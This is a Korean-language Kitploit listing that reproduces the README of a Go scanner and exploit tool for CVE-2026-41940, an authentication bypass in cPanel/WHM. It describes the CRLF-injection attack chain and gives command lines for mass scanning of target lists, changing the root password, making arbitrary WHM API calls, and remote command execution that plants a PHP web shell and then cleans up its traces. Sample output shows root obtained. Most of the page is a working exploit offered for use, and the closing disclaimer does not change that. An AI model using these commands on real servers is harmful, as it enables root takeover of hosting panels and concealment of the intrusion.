Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cPanelWHM-AuthBypass — Go 기반 스캐너 및 익스플로잇 도구로, cPanel/WHM의 인증 우회 취약점인 CVE-2026-41940을 대상으로 합니다. 배치 스캔, 토큰 유출, 그리고 RCE, 비밀번호 변경, API 호출과 같은 사후 익스플로잇 작업을 지원합니다. | Kitploit
도구/GitHubGitHub/kagantua/cpanelwhm-authbypass
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingAuthenticationRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Go 기반 스캐너 및 익스플로잇 도구로, cPanel/WHM의 인증 우회 취약점인 CVE-2026-41940을 대상으로 합니다. 배치 스캔, 토큰 유출, 그리고 RCE, 비밀번호 변경, API 호출과 같은 사후 익스플로잇 작업을 지원합니다.

저장소 보기
1073개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

cPanel/WHM Auth Bypass Scanner & Exploit Tool

watchTowr의 Python PoC를 Go로 재작성한 CLI 도구로, CVE-2026-41940 cPanel/WHM 인증 우회 취약점을 탐지하고 악용합니다.

취약점 개요

CVE-2026-41940은 cPanel/WHM의 인증 우회 취약점으로, CRLF 주입을 통해 Basic Auth 헤더에 개행 문자를 삽입하여 보안 토큰을 유출하고 WHM root 권한을 획득합니다.

4단계 공격 체인:

  1. 사전 인증 — /login/에 잘못된 자격 증명을 전송하여 원본 whostmgrsession 쿠키 획득
  2. CRLF 주입 — Authorization: Basic 헤더에 개행 문자를 주입하여 서버가 307 리디렉션의 Location 헤더에 cpsess 보안 토큰을 유출하도록 유도
  3. 토큰 전파 — do_token_denied를 트리거하여 주입된 인증 데이터를 원본 저장소에서 캐시로 전파
  4. 권한 검증 — 유출된 토큰으로 /json-api/version에 접근하여 root 권한 획득 여부 확인

기능 특징

  • 대량 스캔 — 파일에서 대상 일괄 탐지, 동시 실행
  • 단일 대상 탐지 — 단일 URL 지정으로 빠른 검증
  • URL 지능형 처리 — http://, https://, 프로토콜 없는 형식 자동 호환, 자동 중복 제거
  • 취약점 악용
    • root 비밀번호 변경 (-passwd)
    • 임의 WHM API 호출 (-api)
    • 원클릭 로그인 URL 생성 (-session)
    • 원격 명령 실행 / RCE (-cmd)
  • 터미널 하이라이트 — [VULN] 빨간색, [SAFE] 초록색 강조 표시
  • 결과 저장 — 취약한 URL을 파일에 자동 저장

컴파일

root@kitploit:~
# Go 1.20+ 필요
cd cpanel-checker
go build -o cpanel-checker .

사용 방법

매개변수 목록

매개변수설명예시
-u단일 대상 URL-u https://1.2.3.4:2087
-fURL 목록이 포함된 파일-f targets.txt
-o출력 파일 경로 (기본값 result.txt)-o vuln.txt
-c동시 실행 수 (기본값 10)-c 20
-hostnameHost 헤더 수동 지정 (기본값 자동 발견)-hostname cpanel.example.com
-passwdroot 비밀번호 변경 (-u 모드 전용)-passwd NewP@ss123
-apiWHM API 함수 호출 (-u 모드 전용)-api listaccts
-api-paramsWHM API 매개변수, 쉼표로 구분-api-params user=root,password=123
-sessionroot 원클릭 로그인 URL 생성 (-u 모드 전용)-session
-keepRCE 임시 계정 유지 (-cmd와 함께 사용)-keep
-cmd원격 명령 실행 / RCE (-u 모드 전용)-cmd "id"

1. 단일 대상 탐지

root@kitploit:~
./cpanel-checker -u https://target:2087

포트 기본값은 2087이며, 다음 표기법은 동일합니다:

root@kitploit:~
./cpanel-checker -u https://target
./cpanel-checker -u target

2. 대량 스캔

root@kitploit:~
./cpanel-checker -f targets.txt -c 20

targets.txt는 다음 형식을 지원합니다 (한 줄에 하나, #로 시작하는 줄은 주석):

root@kitploit:~
https://1.1.1.1:2087
http://2.2.2.2:2087
3.3.3.3:2087
4.4.4.4
# 이것은 주석입니다
  • 자동 중복 제거: http://1.1.1.1과 https://1.1.1.1은 동일한 대상으로 간주되어 한 번만 스캔
  • 프로토콜 없는 주소는 자동으로 https://로 완성
  • 포트 없는 주소는 자동으로 2087 사용
  • 결과는 result.txt에 저장 (-o로 사용자 지정 가능)

3. root 비밀번호 변경

root@kitploit:~
./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"

4. 임의 WHM API 호출

root@kitploit:~
# 모든 계정 나열
./cpanel-checker -u https://target:2087 -api listaccts

# 매개변수와 함께 호출
./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"

5. 원클릭 로그인 URL 생성

root@kitploit:~
./cpanel-checker -u https://target:2087 -session

URL이 출력되며, 브라우저에서 열면 WHM 관리 패널에 접속할 수 있습니다. 패널의 Terminal 기능을 사용하면 대화형 root 셸을 얻을 수 있습니다.

참고: -session은 반자동입니다 — 도구가 로그인 URL을 생성한 후, 브라우저에서 직접 열어야 합니다.

6. 원격 명령 실행 (RCE)

root@kitploit:~
./cpanel-checker -u https://target:2087 -cmd "id"

-keep를 추가하면 임시 계정이 유지되어 cPanel 백엔드에 로그인할 수 있습니다:

root@kitploit:~
./cpanel-checker -u https://target:2087 -cmd "id" -keep

-keep 사용 시 출력에 임시 계정의 사용자 이름, 비밀번호, cPanel 로그인 주소(https://host:2083)가 포함되며, 이 자격 증명으로 cPanel 패널에 바로 로그인할 수 있습니다.

-cmd는 완전 자동이며 추가 수동 작업이 필요 없습니다. 내부 프로세스:

  1. 인증 우회를 이용하여 root 권한 획득
  2. WHM API를 통해 임시 cPanel 계정 생성
  3. UAPI (Fileman::save_file_content)를 통해 PHP 셸을 ~/public_html/에 작성
  4. HTTP로 https://host/~tmpuser/shell.php에 접근하여 명령 실행
  5. 명령 출력 반환
  6. 임시 계정 자동 삭제 (흔적 정리)

전제 조건: 대상의 80 또는 443 포트에 접근 가능해야 하며, Apache/httpd가 실행 중이어야 합니다.

7. 조합 사용

여러 악용 매개변수를 동시에 사용할 수 있습니다:

root@kitploit:~
# 로그인 URL 획득, 명령 실행, 비밀번호 변경을 동시에
./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"

8. Host 헤더 수동 지정

대상 IP가 cPanel에 구성된 호스트 이름과 일치하지 않을 때 수동으로 지정할 수 있습니다:

root@kitploit:~
./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com

기본적으로 도구는 /openid_connect/cpanelid의 307 리디렉션을 통해 올바른 호스트 이름을 자동으로 발견합니다.

출력 예시

대량 스캔

root@kitploit:~
[1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
[2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
[3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
[4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
[5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched

========== 스캔 완료 ==========
총계: 5 | 취약점 존재: 2

  ● https://1.1.1.1:2087
  ● https://4.4.4.4:2087

[+] 결과가 result.txt에 저장되었습니다

RCE 실행

root@kitploit:~
[*] 대상: https://target:2087
[*] 모드: 취약점 악용

[0] hostname = cpanel.example.com
[1] minting a preauth session...
    session base = abc123def456
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    leaked token = /cpsess1234567890
[3] firing do_token_denied to propagate raw -> cache...
    gadget fired
[4] verifying we're WHM root...
[+] WHM root 권한 획득

[*] 원격 명령 실행 (RCE)...
    [a] 임시 계정 생성: tmpabcde
    [b] 셸 작성: /home/tmpabcde/public_html/random.php
    [c] 명령 실행: id
    [d] 임시 계정 정리: tmpabcde
[+] 명령 출력:
uid=0(root) gid=0(root) groups=0(root)

[+] 완료. https://target:2087이(가) 제어되었습니다

주의사항

  • 악용 매개변수 (-passwd, -api, -session, -cmd)는 -u 단일 대상 모드에서만 사용 가능하며, -f 대량 모드에서는 지원되지 않습니다
  • 도구는 기본적으로 TLS 인증서 검증을 건너뜁니다
  • 요청 제한 시간은 15초입니다
  • URL 파일에서 #로 시작하는 줄은 무시됩니다

면책 조항

본 도구는 승인된 보안 테스트 및 연구 목적으로만 제공됩니다. 승인 없이 시스템을 테스트하는 것은 불법 행위입니다. 사용자는 대상 시스템 소유자의 명시적인 서면 승인을 받았는지 확인해야 합니다. 저자는 어떠한 오용 행위에 대해서도 책임을 지지 않습니다.

감사의 말

  • 원본 PoC: watchTowr / Sina Kheirkhah (@SinSinology)
  • CVE: CVE-2026-41940
도구 다운로드